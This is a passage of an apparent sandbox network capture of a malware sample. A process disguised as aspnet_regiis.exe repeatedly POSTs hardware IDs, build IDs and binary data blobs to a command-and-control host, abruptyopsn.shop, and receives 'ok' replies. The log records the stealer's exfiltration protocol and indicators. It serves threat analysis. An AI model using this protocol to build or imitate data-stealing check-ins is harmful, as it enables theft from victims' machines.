ykFlS/+O0epLKKMM8HC4DMMTDbDTtax7QQHDuySU7L+YQ2faq9zY6s6h4g11IL6cBAIP8sJjv3sCg4J5p5U9qIhAY4l9jxDoy2sjizAwu42DkA8yVvXsqJNTwbw0gSygTcNgCW1GkS7LayFNcqC+nAQCD/LCY797w8CBfqeXPK5JgCVJfg+QKAptIcsycngPQ1HN8tB3P2sQwgZqMoc3rMwAMUN7SVErD2tizKG3asnSU80hxGWveMOHQTpmFb/
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 5a 71 72 79 56 54 74 79 75 35 79 43 65 47 78 65 6c 2b 55 51 67 7a 79 45 66 62 74 75 59 4b 43 67 6e 72 6c 31 6e 34 76 43 30 4c 6a 79 50 39 4e 6b 61 6d 4a 71 57 49 4d 63 66 4f 34 54 63 48 51 58 69 4a 43 64 47 6c 6f 6c 74 50 4e 2f 69 56 52 50 2b 67 59 7a 69 45 4f 2b 59 6d 54 72 41 71 35 4b 6b 39 79 73 48 67 4f 52 6b 49 4a 34 6c 51 6c 72 72 75 51 31 64 42 36 4a 5a 51 38 62 63 76 42 59 6f 6c 38 44 68 4d 71 69 4b 30 69 54 76 4f 7a 75 30 7a 47 30 49 79 31 55 44 66 73 4f 77 4c 48 51 4b 6f 33 42 7a 31 71 47 46 53 78 78 6a 39 4d 45 2b 32 49 61 6e 47 49 59 6a 62 70 54 6b 46 43 47 43 48 57 38 53 39 36 51 4d 49 44 2f 71 54 56 50 32 36 49 51 79 4d 49 50 51 36 52 36 34 6c 6f 49 63 7a 78 38 50 6c 4f 77 6c 42 4b 73 6f 4a 6d 50 33 6c 47 30 39 5a 71 4b 56 51 2b 59 45 69 48 Data Ascii: ZqryVTtyu5yCeGxel+UQgzyEfbtuYKCgnrl1n4vC0LjyP9NkamJqWIMcfO4TcHQXiJCdGloltPN/iVRP+gYziEO+YmTrAq5Kk9ysHgORkIJ4lQlrruQ1dB6JZQ8bcvBYol8DhMqiK0iTvOzu0zG0Iy1UDfsOwLHQKo3Bz1qGFSxxj9ME+2IanGIYjbpTkFCGCHW8S96QMID/qTVP26IQyMIPQ6R64loIczx8PlOwlBKsoJmP3lG09ZqKVQ+YEiH
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 33 55 75 42 30 39 74 52 6c 6b 35 47 79 62 6c 74 58 64 74 34 4a 77 50 32 36 55 55 46 42 2b 74 49 45 73 76 63 69 47 4a 55 73 39 43 56 41 35 78 4b 59 70 6a 58 4b 77 65 6b 2f 44 67 68 32 68 30 61 57 35 64 74 44 44 42 50 36 33 55 33 6b 76 54 45 4e 79 79 4c 6d 50 6b 2f 67 59 75 62 4b 4f 73 33 4f 34 44 6b 5a 42 79 72 58 51 74 71 72 72 67 63 64 51 61 62 53 54 66 6d 2f 4d 77 53 41 5a 65 59 6c 54 72 41 76 6f 34 46 79 7a 74 50 6f 4d 6b 6b 47 65 4e 4a 43 32 72 76 76 46 6b 41 51 2f 70 46 4b 39 66 77 70 47 34 6f 6d 74 77 77 4e 34 44 54 6d 33 6e 37 7a 77 65 73 77 44 6c 34 70 69 6d 6e 64 73 65 45 50 44 67 61 6f 33 42 7a 30 38 48 6c 5a 79 57 72 7a 49 67 50 34 66 50 54 64 61 35 57 56 74 57 77 57 42 69 47 48 58 35 62 6c 73 45 31 50 45 36 6a 4b 48 4c 57 7a 4d 78 69 42 4b 65 Data Ascii: 3UuB09tRlk5GybltXdt4JwP26UUFB+tIEsvciGJUs9CVA5xKYpjXKwek/Dgh2h0aW5dtDDBP63U3kvTENyyLmPk/gYubKOs3O4DkZByrXQtqrrgcdQabSTfm/MwSAZeYlTrAvo4FyztPoMkkGeNJC2rvvFkAQ/pFK9fwpG4omtwwN4DTm3n7zweswDl4pimndseEPDgao3Bz08HlZyWrzIgP4fPTda5WVtWwWBiGHX5blsE1PE6jKHLWzMxiBKe
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 4b 71 57 51 50 59 48 38 32 78 73 45 52 54 33 4a 54 75 69 44 77 77 6b 66 44 4f 65 56 59 73 79 48 4d 41 32 58 61 4e 45 77 56 61 4e 73 36 4d 59 6d 68 70 71 6c 48 77 4e 59 4e 63 68 4f 6c 76 4f 69 42 30 39 5a 71 4c 64 52 2f 37 55 76 44 63 55 4c 2f 53 4e 4f 72 79 76 6d 79 48 37 4b 67 72 31 2b 43 45 49 6f 79 6b 62 52 38 65 55 5a 43 45 47 6d 30 6c 4b 79 36 47 45 4c 6a 54 72 36 50 45 54 73 4b 71 69 49 66 74 6d 4d 2f 48 34 66 43 47 43 55 42 35 61 76 6f 6c 74 50 52 75 61 66 58 66 47 2b 49 68 69 56 4c 50 51 6c 51 4f 63 53 6d 4b 4d 7a 79 38 66 72 4f 54 64 32 47 63 31 5a 32 37 4c 6c 51 53 38 47 2f 70 46 69 7a 49 63 77 44 5a 64 6f 30 54 42 56 6f 32 7a 6f 78 69 61 47 6d 71 55 66 41 31 67 31 79 45 36 55 6e 65 55 56 44 45 47 6d 30 6c 69 79 36 47 45 76 69 69 66 79 50 55 54 Data Ascii: KqWQPYH82xsERT3JTuiDwwkfDOeVYsyHMA2XaNEwVaNs6MYmhpqlHwNYNchOlvOiB09ZqLdR/7UvDcUL/SNOryvmyH7Kgr1+CEIoykbR8eUZCEGm0lKy6GELjTr6PETsKqiIftmM/H4fCGCUB5avoltPRuafXfG+IhiVLPQlQOcSmKMzy8frOTd2Gc1Z27LlQS8G/pFizIcwDZdo0TBVo2zoxiaGmqUfA1g1yE6UneUVDEGm0liy6GEviifyPUT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:07 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8Q1SN741JY6N9PGIP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18164 Host: abruptyopsn.shop
2024-12-30 20:09:07 UTC	15331	OUT	Data Raw: 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 51 31 53 4e 37 34 31 4a 59 36 4e 39 50 47 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 Data Ascii: --8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="pid"2--8Q1SN741JY6N9PGIPContent-Disposition: form-data; name="lid"HpOoIh--73f82eed
2024-12-30 20:09:07 UTC	2833	OUT	Data Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
2024-12-30 20:09:09 UTC	1132	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gq85cvnu0gertgec9qgtumdjq3; expires=Fri, 25 Apr 2025 13:55:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrCNRTUsEvWDoRMVheSPB8oyIkV%2FyeoZ9Y2wDFO4leBB2GpEpWGQYZkIG3%2BUtkI54CoGMzP4oojOldJ%2BfWt0fiS%2FAp7Quz2VucyiNRxO4kGIP8SYNOmXyx4wSGS0W9OI3%2Fvs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa6fafdcc323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1527&min_rtt=1522&rtt_var=581&sent=11&recv=22&lost=0&retrans=0&sent_bytes=3053&recv_bytes=19125&delivery_rate=2800511&cwnd=215&unsent_bytes=0&cid=69cc455f4e8464a4&ts=2110&x=0"
2024-12-30 20:09:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:09:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:10 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1MZ47H0K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8731 Host: abruptyopsn.shop
2024-12-30 20:09:10 UTC	8731	OUT	Data Raw: 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 31 4d 5a 34 37 48 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --1MZ47H0KContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--1MZ47H0KContent-Disposition: form-data; name="pid"2--1MZ47H0KContent-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--1MZ47H0KContent-D
2024-12-30 20:09:10 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6cqqq0b5vu0bnq8k4vg5otmfj5; expires=Fri, 25 Apr 2025 13:55:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14WAIVg5TZOYflkt21SWwFVMZw5Il1ahiS%2B1UslpbbJpxXazlklaQFPmR7e2XXOCrPUBE5Y4iRj9Cq%2F7e7jmJVjbA8ddFAWXwZgnvfyEcSXOJwi3bYMQ7Dl%2BKQ41b2ay8PUq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa80dd068cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1940&rtt_var=731&sent=9&recv=15&lost=0&retrans=0&sent_bytes=3051&recv_bytes=9660&delivery_rate=2239263&cwnd=243&unsent_bytes=0&cid=d5648ed98f9e2240&ts=473&x=0"
2024-12-30 20:09:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:09:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:11 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GPAI8DCFR4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20396 Host: abruptyopsn.shop
2024-12-30 20:09:11 UTC	15331	OUT	Data Raw: 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 47 50 41 49 38 44 43 46 52 34 0d 0a 43 Data Ascii: --GPAI8DCFR4Content-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--GPAI8DCFR4Content-Disposition: form-data; name="pid"3--GPAI8DCFR4Content-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--GPAI8DCFR4C
2024-12-30 20:09:11 UTC	5065	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 Data Ascii: lrQMn 64F6(X&7~`aO@
2024-12-30 20:09:12 UTC	1125	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pnfmk9oqbesq885u05dgb2ug7r; expires=Fri, 25 Apr 2025 13:55:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2By76LTMLWSwIrVlo40Y0A8ixS%2BTLqBFmtzBv7TetPYq8o9RBTfpUdkT6LTBPNEaJukPl5aIXuidfeNOiJqmCultf9A0PVQQgpUvKMYjnUQYAAfRHaY0H27VLavvSaove%2FjW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa890e52c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1555&rtt_var=587&sent=15&recv=26&lost=0&retrans=0&sent_bytes=3052&recv_bytes=21350&delivery_rate=2788033&cwnd=229&unsent_bytes=0&cid=38781dd075333470&ts=701&x=0"
2024-12-30 20:09:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:09:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:13 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XPL7PGYO3KAM3SH2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1265 Host: abruptyopsn.shop
2024-12-30 20:09:13 UTC	1265	OUT	Data Raw: 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 50 4c 37 50 47 59 4f 33 4b 41 4d 33 53 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 Data Ascii: --XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="pid"1--XPL7PGYO3KAM3SH2Content-Disposition: form-data; name="lid"HpOoIh--73f82eed652
2024-12-30 20:09:13 UTC	1128	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f34rdua5r3a4imiqt2pvrgdbmf; expires=Fri, 25 Apr 2025 13:55:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVZTPKQcV3hzXfejKk5SECM7eorb9fZPBkctczxV2TwtqY%2FR82XNbaR2d%2F%2Fr28dHWFZvQrmOvbjFpfNBzIW%2BfVIdlwdtlE0ZLf%2Be5fSpaAoBEwvMVBZjIqvgBI%2BarcaCoJCl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa9289ec43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1638&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2180&delivery_rate=2673992&cwnd=227&unsent_bytes=0&cid=3dd5249229169dfa&ts=315&x=0"
2024-12-30 20:09:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:09:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:14 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=280R3H752XCO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1094 Host: abruptyopsn.shop
2024-12-30 20:09:14 UTC	1094	OUT	Data Raw: 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 38 30 52 33 48 37 35 32 58 43 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 0d 0a 2d 2d 32 38 30 52 33 48 37 Data Ascii: --280R3H752XCOContent-Disposition: form-data; name="hwid"40C914AF947AA58D20A4C476FD51BCB1--280R3H752XCOContent-Disposition: form-data; name="pid"1--280R3H752XCOContent-Disposition: form-data; name="lid"HpOoIh--73f82eed6521--280R3H7
2024-12-30 20:09:15 UTC	1121	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dltdgf37ud5lcgflmgrj0vff64; expires=Fri, 25 Apr 2025 13:55:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnoFNyowqQ1pAsgePy%2BEAisDykBx9E5TUbgAqe1u0NhTixDDFYXrWM7Q35%2BZqDxaLzAOJH8JSi9Tf6flfZOEahaEynwihzFUsEehMAb8Khc1uJtz1QajwtEAbBw4Iak0faHE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa982d0dc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1664&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3051&recv_bytes=2005&delivery_rate=2562902&cwnd=229&unsent_bytes=0&cid=4c25f28f183d68fd&ts=1128&x=0"
2024-12-30 20:09:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 20:09:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: abruptyopsn.shop
2024-12-30 20:09:15 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--73f82eed6521&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=40C914AF947AA58D20A4C476FD51BCB1
2024-12-30 20:09:16 UTC	1124	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s0cnhn3o1c205r9h547ortsdnr; expires=Fri, 25 Apr 2025 13:55:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 